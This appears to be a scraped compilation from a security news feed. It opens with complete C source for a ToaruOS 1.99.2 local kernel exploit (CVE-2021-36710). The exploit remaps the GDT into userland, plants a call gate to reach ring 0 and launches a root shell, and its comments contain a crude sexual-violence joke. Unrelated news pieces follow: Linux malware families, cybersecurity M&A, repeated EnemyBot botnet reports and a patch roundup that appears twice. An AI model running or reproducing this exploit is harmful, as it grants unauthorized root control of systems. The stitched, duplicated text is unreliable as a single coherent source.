ToaruOS 1.99.2 is affected by incorrect access control via the kernel. Improper MMU management and having a low GDT address allows it to be mapped in userland. A call gate can then be written to escalate to CPL 0.

/\* \* The Mickey Mouse Hacking Squadron proudly presents \* \* ToaruOS 1.99.2 sysfunc local kernel exploit \* \* PART III: THE MMU STRIKES BACK \* Starring \* \* Kay 'What the MMU?' Lange \* Mickey Mouse \* \* \* .-"""-. \* / . - \\ \* \\ / \* .-""-.,:.-\_-.< \* / \_; , / ).| \* \\ ; / \` \`" '\\ \* '.-| ;-.\_\_\_\_, | ., \* \\ \`.\_~\_/ / /"/ \* ,. /\`-.\_\_.-'\\\`-.\_ ,",' ; \* \\"\\ / /| o \\.\_ \`-.\_; / ./-. \* ; ';, / / | \`\_\_ \\ \`-.,( / //.-' \* :\\ \\\\;\_.-" ; |.-"\` \`\`\\ /-. /.-' \* :\\ .\\),.-' / }{ | '..' \* \\ .-\\ | , / \* '..' ;' , / \* ( \_\_ \`;--;'\_\_\`) \* \`//'\` \`||\` \* \_// || \* .-"-.\_,(\_\_) .(\_\_).-""-. \* / \\ / \\ \* \\ / \\ / \* \`'--=="--\` \`--""==--'\` \* \* local@livecd ~$ gcc -Wall kowasu-sysfunc-strikes-back.c -o meh \* local@livecd ~$ whoami \* local \* local@livecd ~$ ./meh \* 0@livecd /home/local# whoami \* root \* \* Tested on VMWare only. If this crashes ToaruOS, well, so does ToaruOS. \*/ #include <assert.h\> #include <stdio.h\> #include <unistd.h\> #include <inttypes.h\> #include <string.h\> #include <sys/sysfunc.h\> #include <kernel/process.h\> #include <kernel/spinlock.h\> #include <kernel/arch/x86\_64/pml.h\> #define ENTRY\_MASK 0x1FF #define PAGE\_SHIFT 12 #define CANONICAL\_MASK 0xFFFFFFFFFFFFULL #define HIGH\_MAP\_REGION 0xFFFFFF8000000000ULL #define PAGE\_ALIGN(x) ((x) & ~0xFFF) #define PAGE\_ADDR(x) (((x) & CANONICAL\_MASK) >> PAGE\_SHIFT) #define PML4\_PAGE(pml, a) ((pml\[PAGE\_ADDR(a) >> 27\].bits.page) << PAGE\_SHIFT) #define PDP\_PAGE(pml, a) ((pml\[PAGE\_ADDR(a) >> 18\].bits.page) << PAGE\_SHIFT) #define PD\_PAGE(pml, a) ((pml\[PAGE\_ADDR(a) >> 9\].bits.page) << PAGE\_SHIFT) struct gdtr { uint16\_t limit; uint64\_t base; } \_\_attribute\_\_((packed)); typedef struct { uint32\_t address; uint16\_t selector; } \_\_attribute\_\_((packed)) lcall\_arg\_t; /\* We access the GDTR from both user and kernel, so we keep it global. \*/ struct gdtr g; /\* We also access the TSS descriptor and backup from user and kernel. \*/ uint8\_t \*tss; uint8\_t tss\_old\[16\]; static inline uint16\_t make\_selector(int index, int ti, int rpl) { return index << 3 | ti << 2 | rpl; } static inline void make\_callgate(void \*p, uint16\_t selector, uint64\_t offset, int dpl) { ((uint16\_t \*)p)\[0\] = offset; ((uint16\_t \*)p)\[1\] = selector; ((uint8\_t \*)p)\[4\] = 0; ((uint8\_t \*)p)\[5\] = 0x80 | dpl << 5 | 12; ((uint16\_t \*)p)\[3\] = offset >> 16; ((uint32\_t \*)p)\[2\] = offset >> 32; ((uint32\_t \*)p)\[3\] = 0; } static inline void \* mmu\_map\_from\_physical(uintptr\_t frameaddress) { return (void \*)(frameaddress | HIGH\_MAP\_REGION); } static inline union PML \* mmu\_get\_page(uint64\_t address) { union PML \*pml; /\* We take shortcuts: if the first GDT page were to suddenly have \* disappeared from the tables we're fucked like a skank on roofies \* during prom night anyway. \*/ pml = this\_core->current\_pml; pml = mmu\_map\_from\_physical(PML4\_PAGE(pml, address)); pml = mmu\_map\_from\_physical(PDP\_PAGE(pml, address)); pml = mmu\_map\_from\_physical(PD\_PAGE(pml, address)); return (union PML \*)&pml\[PAGE\_ADDR(address) & ENTRY\_MASK\]; } /\* Safety play. Modern times are so wordy. I really really really \* wanna push- and popa. \*/ extern void callgate(void); asm ( ".global callgate\\n" "callgate:\\n" "swapgs\\n" "push %r15\\n" "push %r14\\n" "push %r13\\n" "push %r12\\n" "push %r11\\n" "push %r10\\n" "push %r9\\n" "push %r8\\n" "push %rdi\\n" "push %rsi\\n" "push %rdx\\n" "push %rcx\\n" "push %rbx\\n" "push %rax\\n" "call callgate\_handler\\n" "pop %rax\\n" "pop %rbx\\n" "pop %rcx\\n" "pop %rdx\\n" "pop %rsi\\n" "pop %rdi\\n" "pop %r8\\n" "pop %r9\\n" "pop %r10\\n" "pop %r11\\n" "pop %r12\\n" "pop %r13\\n" "pop %r14\\n" "pop %r15\\n" "swapgs\\n" "lretq\\n" ); /\* CPL0 code. \*/ void callgate\_handler(void) { union PML \*gdt\_page; spin\_lock(this\_core->current\_process\->image.lock); this\_core->current\_process\->user = 0; this\_core->current\_process\->real\_user = 0; /\* Get the GDT base page and give it back to the kernel. This way the \* process exit routine will not free it once we exit. \*/ gdt\_page = mmu\_get\_page(PAGE\_ALIGN(g.base)); gdt\_page->bits.user = 0; /\* Invalidate the TLB entry for the first GDT page. \*/ asm volatile ("invlpg (%0)"::"r"(PAGE\_ALIGN(g.base)):"memory"); /\* Restore the GDT TSS descriptor while we're at it. \*/ for (int i = 0; i < 16; i++) tss\[i\] = tss\_old\[i\]; spin\_unlock(this\_core->current\_process\->image.lock); } int main(void) { char \*args\[2\]; /\* Get the GDTR so we can target the base descriptor table. \*/ asm volatile ("sgdt %0":"\=m"(g)::"memory"); /\* Get the TSS descriptor, as we can clobber it with a callgate. TR \* caches the descriptor value, so ruining it does not really matter \* much, and we'll restore it when we're done. \*/ tss = (void \*)(g.base + 40); /\* Call TOARU\_SYS\_FUNC\_MMAP to remap the lower region GDT. \* \* This was initialized in the lower ranges during multiboot, and as a \* result the higher page directories are not owned by the kernel but \* by the user. Next mmu\_frame\_allocate will conveniently set the user \* bit to 1 for us. \*/ args\[0\] = (char \*)PAGE\_ALIGN(g.base); args\[1\] = (char \*)4096; if (sysfunc(TOARU\_SYS\_FUNC\_MMAP, args) < 0) { perror("sysfunc()"); exit(EXIT\_FAILURE); } /\* Make a copy of the TSS descriptor for restoration later on. \*/ memcpy(tss\_old, tss, 16); /\* Make a CPL3 -> CPL0 callgate. Note that the kernel cs descriptor is \* at GDT index 1. \*/ make\_callgate(tss, make\_selector(1, 0, 0), (uint64\_t)callgate, 3); /\* Perform a far call to the callgate we set up at GDT index 5. We \* call a callgate so a 32-bit call destination is fine, as the \* destination comes from the gate descriptor anyway. \*/ lcall\_arg\_t lca = { 0, make\_selector(5, 0, 3) }; asm volatile ("lcall \*%0"::"m"(lca)); /\* This is my boom schtick! \*/ args\[0\] = "/bin/sh"; args\[1\] = NULL; execve("/bin/sh", args, NULL); /\* Well, crud. \*/ perror("execve()"); exit(EXIT\_FAILURE); }

CVE-2021-36710: kowasuos/kowasu-sysfunc-strikes-back.c at master · mehsauce/kowasuos

In this post, we’ll give you an overview of five Linux malware families your SMB should be protecting itself against — and how they work.
The post 5 Linux malware families SMBs should protect themselves against appeared first on Malwarebytes Labs.

There’s no shortage of reasons why an SMB might use Linux to run their business: There are plenty of distros to choose from, it’s (generally) free, and perhaps above all — it’s secure.

The common wisdom goes that Linux malware is rare, and for the most part this is true. Thanks to its built-in security defenses, strict user privilege model, and transparent source code, Linux enjoys far fewer malware infections than other operating systems.

But unfortunately, there’s more to Linux security than just leaning back in your chair and sipping piña coladas. There are dozens of Linux malware families out there today threatening SMBs with anything from ransomware to DDoS attacks.

In this post, we’ll give you an overview of five Linux malware families your SMB should be protecting itself against — and how they work.

**1.   Cloud Snooper**

In early 2020, researchers found something weird going on with Linux servers hosted by Amazon Web Services (AWS). Specifically, they noticed some servers were receiving some anomalous inbound traffic.

In a perfect world, the firewalls of our servers would only allow web traffic in from trusted ports. With the Cloud Snooper malware, however, untrusted web traffic sneaks past firewalls and enters right into Linux servers — a big no-no.

**How it works**

The hackers pull this off with a rootkit, a set of malware tools that gives someone the highest privileges in a system. Attackers use the rootkit to then install a backdoor trojan which can steal sensitive data from the servers.

At a high level, Cloud Snooper gets past firewall rules by sending innocent-looking requests to the web server which actually contain hidden instructions for the backdoor trojan. From there, the attackers can do anything from log computer activity, steal data, or delete files.

It’s still unclear how the malware is installed in the first place, though the researchers think attackers break into servers using SSH.

**2.   QNAPCrypt**

If you wake up one morning and find that all of your files are encrypted along with a ransom note demanding a Bitcoin payment — you just may have been hit with QNAPCrypt.

QNAPCrypt is ransomware that specifically targets Linux-based NAS (Network Attached Storage) servers. It gets its name from QNAP, a popular vendor for selling NAS servers.

**How it works**

QNAPCrypt exploits a vulnerability in QNAP NAS running HBS 3 (Hybrid Backup Sync) to allow remote attackers to log in to a device. Once launched, the ransomware iterates through a list of files and encrypts them with an encryption algorithm, with the .**encrypt** extension being appended to affected files.

According to recent posts in a BleepingComputer forum, ransom payments are about .024BTC (~$720 USD as of June 2022).

**3.   Cheerscrypt**

Does your SMB use VMware ESXi servers? If so, you better watch out for Cheerscrypt, another Linux-based ransomware.

**How it works**

Upon execution, Cheerscrypt hijacks the ESXCLI tool — which allows for remote management of ESXi hosts — and uses it to terminate all VM processes. From there, hackers can encrypt all of your VMware-related files and rename them to the .**Cheers** extension.

The ransom note, named “How to Restore Your Files.txt”, threatens to expose company data if the ransom is not paid.

**4.   HiddenWasp**

HiddenWasp is a new strain of Linux malware that remotely controls infected systems with an initial deployment script, a trojan, and a rootkit.

**How it works**

After HiddenWasp installs all of the malware components to your computer, the deployment script begins to execute the trojan and add the rootkit. The rootkit is added then to a given process, where it hides the existence of the trojan. The trojan, in turn, helps the rootkit remain operational.

From there, attackers can execute files, spy on computer usage, change system configurations, and so on — all while being unseen.

**5.   Mirai**

From manufacturing to healthcare, tons of industries today are using the Internet-of-Things (IoT) to help streamline their operations — and at the heart of every IoT device is Linux. Mirai, a botnet responsible for the “takedown of the Internet” in 2016, takes advantage of this by hijacking IoT hardware to launch DDoS attacks.

**How it works**

Mirai is a self-replicating worm that scans for and infects vulnerable IoT devices that use default or weak usernames and passwords. Once infected, these compromised IoT devices can be told what to do via a central set of command and control (C&C) servers, specifically to launch DDoS attacks.

While Mirai itself may not be around anymore, its source code lives on in several other botnets variants including Hajime, SYLVEON, and SORA.

**Stop Linux malware from getting a hold on your organization**

It may be true that Linux is more secure than most other operating systems, but make no mistake — Linux malware exists, and can have devastating effects on SMBs.

While we have given a brief overview of five Linux malware families, there are dozens more out there, each with their own unique payload. From ransomware and rootkits to trojans and botnets, there’s a slew of threats SMBs using Linux need to protect themselves against.

With Malwarebytes EDR for Linux, you can simplify protection, detection, and response capabilities across your entire organization. Even brand-new, unidentified Linux malware can typically be eliminated before it can impact your data center servers.

Additionally, applying in-depth insights from our proprietary Linking Engine remediation technology, Malwarebytes thoroughly and permanently removes both the infection and any malware artifacts, delivering lethal “one-and-done” remediation.

Learn more about Malwarebytes EDR.

Read the data sheet.

5 Linux malware families SMBs should protect themselves against

But valuations have dropped — and investors are paying closer attention to revenues and profitability, industry analysts say.

Cloud security vendor Lacework's recent announcement that it will reduce head count as part of a restructuring plan — just months after it secured $1.3 billion in a record-setting funding round — may have shocked the high-flying cybersecurity sector, but industry analysts say the layoffs do not signal any broad, imminent industry slowdown.

General economic conditions appear to have made investors a bit more cautious, however: Private equity (PE) investments — which accounted for nearly 40% of merger and acquisition activity last year — are down compared with the same period in 2021, as are company valuations overall.

Even so, M&A and venture capital activity in the cybersecurity industry remains robust and shows little sign of a major slowdown. Just in the last few days, for instance, ReliaQuest announced plans to purchase Digital Shadows for $160 million; Netskope acquired WootCloud for an undisclosed sum; and Lookout acquired SaferPass. In late May, Broadcom announced its intent to buy VMware for $61 billion in a deal that, if approved, will bring VMware's Carbon Black security under Broadcom's roof.

**Multiple Drivers**

"There are multiple dynamics at play for M&A" activity in the cybersecurity space, says Fernando Montenegro, an analyst with Omdia. "The established vendor being acquired for their cash flow. The adjacent technology being acquired by a security vendor to enter a market. The technology tuck-in and/or 'acqui-hire' into an existing vendor," he adds. Expect VCs, private equity, and corporate development teams to be a little more cautious, but still active, he notes.

"The industry has had a strong pace of acquisitions and fundings over the years, and we expect that to continue," Montenegro says. "What is changing is that there appears to be much more focus on demonstrating actual capabilities and momentum while being mindful of run rate."

There's also the understanding that too-large funding rounds raise expectations on delivery that may be more difficult to attain in a tightening economic environment, he notes.

Richard Stiennon, chief research analyst at IT-Harvest, says Lacework's decision to downsize and restructure may, in a way, be the result of its own success. The company experienced hypergrowth of some 272% last year and went on a hiring spree. After that, the company might have thought it wise to pause and consolidate while it catches up with expectations on sales growth, Stiennon explains. "There is categorically no broad consolidation in cybersecurity and there will not be until threat actors give up and go home," he says. "We will always need new ways to counter new threats."

That said, the antivirus space for the first time is now truly consolidating, according to Stiennon. Thanks to Microsoft giving away good-enough security with Windows Defender and the availability of stronger endpoint protection capabilities from vendors such as CrowdStrike and SentinelOne, the traditional AV vendors are fading away, he says.

**Fast and Furious Pace**

Data that S&P Global Market Intelligence compiled earlier this year showed there were 42 cybersecurity transactions through March 18, 2022, with a median deal value of some $97 million. Google's $5.4 billion purchase of Mandiant was easily the biggest of those deals and accounted for most of the $6.77 billion in total transaction value of announced deals in the cybersecurity industry through that date. In comparison, there were 36 transactions over the same period in 2021, with a median deal value of $185 million. In all, in the first quarter of 2022 there were 59 deals compared with 49 last year. But total deal value at $9.3 billion was significantly smaller than last year's $17.6 billion, according to S&P Global Market Intelligence.

Rising interest rates, inflation, and concerns over potential economic headwinds appear to have driven down security vendor valuations compared with last year, says Garrett Bekker, an analyst with S&P Global Market Intelligence. Even so, investors appear willing to pay hefty multiples to acquire security firms and the appetite for buying them does not appear to have diminished significantly, he says. That's because most existing drivers remain in place, such as cloud adoption, the move to zero-trust access models, and the proliferation of ransomware and other malware.

One potential red flag is the slowdown in private equity investments so far this year, Bekker says. For the past two decades, there has been a steady increase in PE-funded mergers and acquisitions — from 40 in 2002 to 80 in 2010, and 209 in 2021 — or 37% of all transactions in the space, he says. There has been a near 20% drop-off in PE transactions in 2022 compared with the same period last year, Bekker says. 

"It's a fairly large drop-off," he notes. "We'll be looking to see whether that persists or is an aberration."

**Closer Scrutiny**

Speculation about potential recession and recent turmoil with tech equities is causing venture investors to scrutinize funding more carefully, says Joseph Blankenship, an analyst with Forrester Research. Many investors are also advising the firms they've invested in to slow their burn rate and concentrate on building revenue, with an eye toward profitability. "I do predict that the increased scrutiny, reduced risk appetite, and decreased funding will lead to fewer startups entering the cybersecurity market." It will also push existing firms to find faster exits.

"What we’re seeing now is a continuation of the M&A activity," Blankenship says, At the same time, he adds, buyers are looking to consolidate vendors and the technology portfolios from major cybersecurity vendors are more attractive than they've been previously.

Cybersecurity M&A Activity Shows No Signs of Slowdown

EnemyBot DDoS botnet is rapidly weaponizing security bugs disclosed in CMS systems like WordPress plug-ins, Android devices, commercial Web servers, and other enterprise applications.

An Internet of Things (IoT) botnet dubbed “EnemyBot" is expanding its front lines to target security vulnerabilities in enterprise services — potentially leading to it being a much more virulent threat than it has been, researchers say.

EnemyBot, which is controlled by a threat actor known as Keksec, is a Linux botnet that emerged on the malware scene in late March. It shares source code with two other well-known botnets, Gafgyt (aka Bashlite) and the mighty Mirai, according to a prior analysis from Fortinet. Like those threats, EnemyBot is used to carry out distributed denial-of-service (DDoS) attacks. Other aspects of the code include smaller elements from Qbot and other malware, and some custom development.

While it began life focusing on adding IoT devices and routers to its botnet footprint, EnemyBot has now evolved to add remote code execution (RCE) exploits for a host of popular business applications, including VMware Workspace ONE, Adobe ColdFusion, WordPress sites (via vulnerable plug-ins like Video Synchro PDF), PHP Scriptcase, and others, according to researchers at AT&T Labs. 

Researchers discovered that the group is using a mix of recent, so-called "one-day" bugs, as well as older known issues, looking to take advantage in lags in patching.

Keksec is "now targeting IoT devices, web servers, Android devices and content management system (CMS) servers," according to the firm's recent report, which notes that the latest version of EnemyBot adds a webscan function containing a total of 24 exploits to attack vulnerabilities of different devices and Web servers and self-propagate. 

The enterprise-focused exploits that were recently added include:

*   Log4Shell vulns: CVE-2021-44228, CVE-2021-45046
*   F5 BIG IP devices: CVE-2022-1388
*   Spring Cloud Gateway: CVE-2022-22947
*   TOTOLink A3000RU wireless router: CVE-2022-25075
*   Kramer VIAWare: CVE-2021-35064
*   PHP Scriptcase: No CVE yet assigned
*   Adobe ColdFusion 11: No CVE yet assigned

"The nature of devices and systems targeted through EnemyBot is different than vulnerabilities aimed at corporate datacenters," Bud Broomhead, CEO at Viakoo, tells Dark Reading. "WordPress installations, Android devices, IoT devices and other targets for EnemyBot are all widely deployed (therefore might be hard to find), are operated by organizations of all sizes, and are often managed by lines of business that lack cybersecurity skills."

**EnemyBot: A Super Soldier?**

In addition to the DDoS capabilities, EnemyBot can also receive commands to download and execute new code that could add to its functions or update its vulnerability list, according to the analysis. This means that, worryingly, the malware can adopt new vulnerabilities within days of those issues being discovered, researchers warned, as seen when it added a bug tracked as CVE-2022-22954 affecting VMware Workspace ONE, almost immediately after disclosure.

Sean Malone, CISO at Demandbase, says that given its rapid development, EnemyBot and others like it present a new urgency for enterprise defenders.

"The rapid weaponization of newly released vulnerabilities highlights the need to be able to patch almost instantaneously when new vulnerabilities are identified," he tells Dark Reading. "We should assume that every piece of software, every application development framework, and every IoT device will have a critical vulnerability identified at some point. Our architectures should be designed to limit the available attack surface, and mitigate the blast radius of a compromised system through defense-in-depth measures."

That should include adding the ability to profile systems and network traffic to know what normal looks like, and alert when the system activity and network traffic deviates from that baseline, he adds.

"This botnet emphasizes the need for rapid patching of internet facing devices and the risks of running apps in the cloud," says John Bambenek, principal threat hunter at Netenrich. "This traffic is easily spotted on the wire, but in typical cloud deployments, organizations aren’t able to run network intrusion detection. If organizations aren’t running NIDS or rapidly patching, they are both blind and vulnerable."

**Keksec & EnemyBot's Future**

For its part, Keksec is a well-resourced group that has been around since 2016, making a name for itself by creating various botnets-for-hire. It's known for exploiting vulnerabilities to invade multiple architectures with polymorphic tools (these can include Linux and Windows payloads, as well as custom Python malware), in order to accomplish everything from DDoS to cryptomining to espionage.

For instance, last year the operators made headlines with the "Simps" botnet, which was built for DDoS attacks on gaming targets. Another of its creations is the HybridMQ-keksec botnet, a Frankenstein-like effort created by combining and modifying the source code of Mirai and Gafgyt, just like EnemyBot.

Keksec is constantly adding to its arsenal, and "has the ability to update and add new capabilities to its arsenal of malware on a daily basis," the AT&T Labs researchers note. And indeed, with the new ability to compromise enterprise services and devices, EnemyBot could be poised to ramp up the volume of its attacks.

"In addition, the malware base source code can now be found online on GitHub, making it widely accessible," according to AT&T Labs, whose researchers also note that this won't be the only new EnemyBot variant to bubble up from Keksec's laboratory. "The developer of the GitHub page on EnemyBot self-describes as a 'full time malware dev,' that is also available for contract work."

That spells swelling attack volumes, researchers warn.

"Being available through GitHub means that many types of threat actors, from professional cybercriminals to amateurs, will be able to adapt EnemyBot into new and multiple variants," says Broomhead. "Without question, this is a red-lights-flashing warning sign for organizations to improve their discovery, threat assessment, and remediation capabilities."

EnemyBot Puts Enterprises in the Crosshairs With Raft of '1-Day' Bugs

Malware borrows generously from code used by other botnets such as Mirai, Qbot and Zbot.

Malware borrows generously from code used by other botnets such as Mirai, Qbot and Zbot.

A rapidly evolving IoT malware dubbed “EnemyBot” is targeting content management systems (CMS), web servers and Android devices. Threat actor group “Keksec” is believed behind the distribution of the malware, according to researchers.

“Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices,” reported AT&T Alien labs in a recent post. “The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities,” they added.

 According to AT&T’s analysis of the malware‘s code base, EnemyBot borrows generously from code used by other botnets such as Mirai, Qbot and Zbot. The Keksec group distributes the malware by targeting Linux machines and IoT devices, this threat group was formed back in 2016 and includes several botnet actors.

****EnemyBot Working****

The Alien lab research team study found four main sections of the malware.

The first section is a python script ‘cc7.py’, used to download all dependencies and compile the malware into different OS architectures (x86, ARM, macOS, OpenBSD, PowerPC, MIPS). After compilation, a batch file “update.sh” is created and used to spread the malware to vulnerable targets.

The second section is the main botnet source code, which includes all the other functionality of the malware excluding the main part and incorporates source codes of the various botnets that can combine to perform an attack.

The third module is obfuscation segment “hide.c” and is compiled and executed manually to encode /decode the malware strings. A simple swap table is used to hide strings and “each char is replaced with a corresponding char in the table” according to researchers.

The last segment includes a command-and-control (CC) component to receive vital actions and payloads from attackers.

AT&T researcher’s further analysis revealed a new scanner function to hunt vulnerable IP addresses and an “adb\_infect” function that is used to attack Android devices.

ADB or Android Debug Bridge is a command-line tool that allows you to communicate with a device.

“In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing shell command,” said the researcher.

“Keksec’s EnemyBot appears to be just starting to spread, however due to the authors’ rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,” the researchers added.

This Linux-based botnet EnemyBot was first discovered by Securonix in March 2022, and later in-depth analysis was done by Fortinet.

****Vulnerabilities Currently Exploited by EnemyBot****

The AT&T researchers release a list of vulnerabilities that are currently exploited by the Enemybot, some of them are not assigned a CVE yet.

The list includes Log4shell vulnerability (CVE-2021-44228, CVE-2021-45046), F5 BIG IP devices (CVE-2022-1388), and others. Some of the vulnerabilities were not assigned a CVE yet such as PHP Scriptcase and Adobe ColdFusion 11.

*   Log4shell vulnerability – CVE-2021-44228, CVE-2021-45046
*   F5 BIG IP devices – CVE-2022-1388
*   Spring Cloud Gateway – CVE-2022-22947
*   TOTOLink A3000RU wireless router – CVE-2022-25075
*   Kramer VIAWare – CVE-2021-35064

“This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread,” the researcher explained.

****Recommended Actions** **

The Alien lab researcher suggests methods to protect from the exploitation. Users are advised to use a properly configured firewall and focus on reducing Linux server and IOT devices’ exposure to the internet.

Another action recommended is to monitor the network traffic, scan the outbound ports and look for the suspicious bandwidth usage. Software should be updated automatically and patched with the latest security update.

EnemyBot Malware Targets Web Servers, CMS Tools and Android OS

Plus: Google patches 36 Android vulnerabilities, Cisco fixes three high-severity issues, and VMWare closes two “serious” flaws.

May has been another busy month of security updates, with Google’s Chrome browser and Android operating system, Zoom, and Apple’s iOS releasing patches to fix serious vulnerabilities.

Meanwhile, things have not run smoothly for Microsoft, which was forced to issue an out-of-band update after a disastrous Patch Tuesday during the month. And Cisco, Nvidia, Zoom, and VMWare all issued patches for pressing flaws.

Here’s what you need to know.

Apple iOS and iPadOS 15.5, macOS Big Sur 11.6.6, tvOS 15.5, watchOS 8.6

With Apple due to announce iOS 16 at its Worldwide Developers Conference in June, the iPhone maker released probably its last major iOS 15-point update in May. It came with new features, but iOS and iPadOS 15.5 also fixed 34 security vulnerabilities, some of which are serious.

Security issues fixed in iOS 15.5 include flaws in the Kernel, as well as in the WebKit browser engine, according to Apple’s support page. Thankfully, none of the issued patches in iOS and iPad 15.5 are being used in attacks, according to the company, but that doesn’t mean they won’t be if you don’t update now.

Meanwhile, users of macOS, tvOS, and the Apple Watch should update their devices ASAP, as Apple also issued an emergency update to patch an issue it believes is already being used in attacks. The flaw in Apple AVD, labeled CVE-2022-22675, could allow an app to execute code with Kernel privileges. Issues in the Kernel are as bad as it gets, so it’s worth checking and updating your devices right away.

Microsoft’s Flubbed May Patch Tuesday

Microsoft’s May Patch Tuesday was something of a disaster for the diligent businesses that installed it straight away.

On May 10, the firm issued security updates to fix 75 vulnerabilities, eight labeled as serious and three that were being exploited by attackers. The issues fixed in May’s Patch Tuesday were important, but there were soon problems for some Microsoft users, who reported authentication failures after installing the latest updates. It impacted people using the client and server Windows platforms and systems running all Windows versions, including Windows 11 and Windows Server 2022.

In a bid to fix the problem, the firm was forced to issue an out-of-band update for Windows 10, Windows 11, and Windows Server 2008, 2012, 2016, 2019, and 2022 on May 20. The update won’t install automatically—you need to download it from Microsoft’s update catalog.

Firefox 100.0.2

In early May, Mozilla released Firefox 100, including nine security fixes for its Firefox browser, of which seven were rated as high severity. But later in May, ethical hackers at the Pwn20wn competition in Vancouver were able to demonstrate how attackers could execute JavaScript code on devices running the latest Mozilla software. Mozilla fixed the issues in another updateFirefox 100.0.2, Firefox ESR 91.9.1, Firefox for Android 100.3, and Thunderbird 91.9.1. Click those update buttons.

Android

May’s Android security update is a big one, patching 36 vulnerabilities, including an issue already being exploited by attackers. This exploited flaw is a privilege escalation bug in the Linux Kernel known as “The Dirty Pipe.”

The flaw, which impacts newer Android devices running Android 12 and later, was disclosed by Google in February, but it has taken a while to reach devices.

You Need to Update iOS, Chrome, Windows, and Zoom ASAP

May has been another busy month of security updates, with Google’s Chrome browser and Android operating system, Zoom, and Apple’s iOS releasing patches to fix serious vulnerabilities.

Meanwhile, things have not run smoothly for Microsoft, which was forced to issue an out-of-band update after a disastrous Patch Tuesday during the month. And Cisco, Nvidia, Zoom, and VMWare all issued patches for pressing flaws.

Here’s what you need to know.

Apple iOS and iPadOS 15.5, macOS Big Sur 11.6.6, tvOS 15.5, watchOS 8.6

With Apple due to announce iOS 16 at its Worldwide Developers Conference in June, the iPhone maker released probably its last major iOS 15 point update in May. It came with new features, but iOS and iPadOS 15.5 also fixed 34 security vulnerabilities, some of which are serious.

Security issues fixed in iOS 15.5 include flaws in the Kernel as well as in the WebKit browser engine, according to Apple’s support page. Thankfully, none of the issued patches in iOS and iPad 15.5 are being used in attacks, according to the company, but that doesn’t mean they won’t be if you don’t update now.

Meanwhile, users of macOS, tvOS, and the Apple Watch should update their devices ASAP, as Apple also issued an emergency update to patch an issue it believes is already being used in attacks. The flaw in Apple AVD, labeled CVE-2022-22675, could allow an app to execute code with Kernel privileges. Issues in the Kernel are as bad as it gets, so it’s worth checking and updating your devices right away.

Microsoft’s Flubbed May Patch Tuesday

Microsoft’s May Patch Tuesday was something of a disaster for the diligent businesses that installed it straight away.

On May 10, the firm issued security updates to fix 75 vulnerabilities, eight labeled as serious and three that were being exploited by attackers. The issues fixed in May’s Patch Tuesday were important, but there were soon problems for some Microsoft users, who reported authentication failures after installing the latest updates. It impacted people using the client and server Windows platforms and systems running all Windows versions, including Windows 11 and Windows Server 2022.

In a bid to fix the problem, the firm was forced to issue an out-of-band update for Windows 10, Windows 11, and Windows Server 2008, 2012, 2016, 2019, and 2022 on May 20. The update won’t install automatically—you need to download it from Microsoft's update catalog.

Firefox 100.0.2

In early May, Mozilla released Firefox 100, including nine security fixes for its Firefox browser, of which seven were rated as high severity. But later in May, ethical hackers at the Pwn20wn competition in Vancouver were able to demonstrate how attackers could execute JavaScript code on devices running the latest Mozilla software. Mozilla fixed the issues in another update, Firefox 100.0.2, Firefox ESR 91.9.1, Firefox for Android 100.3, and Thunderbird 91.9.1. Click those update buttons.

Android

May’s Android security update is a big one, patching 36 vulnerabilities including an issue already being exploited by attackers. The already exploited flaw is a privilege escalation bug in the Linux Kernel known as “The Dirty Pipe.”

The flaw, which impacts newer Android devices running Android 12 and later, was disclosed by Google in February, but it’s taken a while to reach devices.

A nascent Linux-based botnet named Enemybot has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS).
"The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities," AT&T Alien Labs said in a technical write-up published last week. "Services

A nascent Linux-based botnet named **Enemybot** has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS).

"The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities," AT&T Alien Labs said in a technical write-up published last week. "Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices."

First disclosed by Securonix in March and later by Fortinet, Enemybot has been linked to a threat actor tracked as Keksec (aka Kek Security, Necro, and FreakOut), with early attacks targeting routers from Seowon Intech, D-Link, and iRZ.

Enemybot, which is capable of carrying out DDoS attacks, draws its origins from several other botnets like Mirai, Qbot, Zbot, Gafgyt, and LolFMe. An analysis of the latest variant reveals that it's made up of four different components -

*   A Python module to download dependencies and compile the malware for different OS architectures
*   The core botnet section
*   An obfuscation segment designed to encode and decode the malware's strings, and
*   A command-and-control functionality to receive attack commands and fetch additional payloads

Also incorporated is a new scanner function that's engineered to search random IP addresses associated with public-facing assets for potential vulnerabilities, while also taking into account new bugs within days of them being publicly disclosed.

"In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing \[a\] shell command," the researchers said, pointing to a new "adb\_infect" function. ADB refers to Android Debug Bridge, a command-line utility used to communicate with an Android device.

Besides the Log4Shell vulnerabilities that came to light in December 2021, this includes recently patched flaws in Razer Sila routers (no CVE), VMware Workspace ONE Access (CVE-2022-22954), and F5 BIG-IP (CVE-2022-1388) as well as weaknesses in WordPress plugins like Video Synchro PDF.

Other weaponized security shortcomings are below -

*   **CVE-2022-22947** (CVSS score: 10.0) - A code injection vulnerability in Spring Cloud Gateway
*   **CVE-2021-4039** (CVSS score: 9.8) - A command injection vulnerability in the web interface of the Zyxel
*   **CVE-2022-25075** (CVSS score: 9.8) - A command injection vulnerability in TOTOLink A3000RU wireless router
*   **CVE-2021-36356** (CVSS score: 9.8) - A remote code execution vulnerability in KRAMER VIAware
*   **CVE-2021-35064** (CVSS score: 9.8) - A privilege escalation and command execution vulnerability in Kramer VIAWare
*   **CVE-2020-7961** (CVSS score: 9.8) - A remote code execution vulnerability in Liferay Portal

What's more, the botnet's source code has been shared on GitHub, making it widely available to other threat actors. "I assume no responsibility for any damages caused by this program," the project's README file reads. "This is posted under Apache license and is also considered art."

"Keksec's Enemybot appears to be just starting to spread, however due to the authors' rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,'' the researchers said.

